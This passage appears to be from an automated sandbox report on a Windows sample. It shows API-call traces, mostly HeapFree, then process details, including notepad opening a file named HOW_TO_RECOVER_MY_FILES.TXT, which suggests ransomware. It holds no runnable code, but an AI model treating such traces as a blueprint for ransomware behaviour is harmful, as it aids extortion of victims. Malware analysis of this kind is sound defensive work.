lpMem=0x4309ca8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335750 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f8c0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f848 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fad0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309d20 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356d0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f890 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fab8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f998 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f278 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335730 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f9c8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa88 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f9e0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f4a0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356f0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f7e8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f800 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f8a8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309e10 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357a0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f8d8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f830 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f9f8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f338 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335740 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb60 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa28 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fdb8 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309cd0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335840 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fda0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd88 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb48 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f680 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357b0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fae8 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc98 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fcb0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f7d0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335850 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb30 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb90 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc38 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x424a000 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356b0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc50 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc80 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd28 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42661f0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335860 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fdd0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb00 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb18 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f650 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357d0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd40 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fba8 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fbc0 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4265ea8 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335780 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fb78 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd58 | out: hHeap=0x1780000) returned 1 [0157.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd70 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309d98 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335760 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fbd8 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fcc8 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fbf0 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc08 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178e130 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ebe8 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335690 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f050 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f0f8 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4265dc8 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335790 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef00 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f068 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f110 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309c80 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335710 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef48 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef78 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef60 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42c6558 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335810 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f098 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef90 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435eff0 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f020 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309b68 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435eb10 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43355f0 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f038 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ee28 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435e9c0 | out: hHeap=0x1780000) returned 1 [0157.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335590 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435eee8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f128 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f1b8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ed08 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43355c0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435efa8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f188 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f140 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4249af0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43355d0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f158 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435efc0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef18 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309cf8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335680 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f0c8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f170 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f1a0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309c30 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356c0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f1d0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ef30 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435efd8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f0e0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f008 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f080 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac340 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435e930 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43355a0 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ea50 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ea20 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435e9a8 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ea68 | out: hHeap=0x1780000) returned 1 [0157.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ecc0 | out: hHeap=0x1780000) returned 1 [0157.449] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0157.449] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x30d40, fWinIni=0x2 | out: pvParam=0x30d40) returned 0 [0157.461] WinHttpRequest:IUnknown:Release (This=0x18523c0) returned 0x0 [0157.586] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0157.599] OleUninitialize () [0157.701] DestroyCursor (hCursor=0xa006f) returned 0 [0157.703] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x11e4 Thread: id = 3 os_tid = 0x11f0 Thread: id = 4 os_tid = 0x3b8 Thread: id = 5 os_tid = 0xe84 Thread: id = 6 os_tid = 0x134 Thread: id = 7 os_tid = 0xf70 Thread: id = 8 os_tid = 0xfac Thread: id = 9 os_tid = 0xec4 Thread: id = 26 os_tid = 0xf64 Thread: id = 27 os_tid = 0xfc4 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 10 os_tid = 0x11c0 Thread: id = 11 os_tid = 0x11bc Thread: id = 12 os_tid = 0x11b8 Thread: id = 13 os_tid = 0x9bc Thread: id = 14 os_tid = 0x7ec Thread: id = 15 os_tid = 0x770 Thread: id = 16 os_tid = 0x7d8 Thread: id = 17 os_tid = 0x698 Thread: id = 18 os_tid = 0x690 Thread: id = 19 os_tid = 0x5fc Thread: id = 20 os_tid = 0x5f8 Thread: id = 21 os_tid = 0x5f4 Thread: id = 22 os_tid = 0x5b4 Process: id = "3" image_name = "notepad.exe" filename = "c:\\windows\\notepad.exe" page_root = "0x5346000" os_pid = "0xfec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "\"C:\\WINDOWS\\notepad.exe\" \"C:\\Users\\FD1HVy\\Desktop\\HOW_TO_RECOVER_MY_FILES.TXT\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x480 Thread: id = 24 os_tid = 0xd10 Thread: id = 25 os_tid = 0x5c4 Thread: id = 28 os_tid = 0x864 Thread: id = 29 os_tid = 0x124c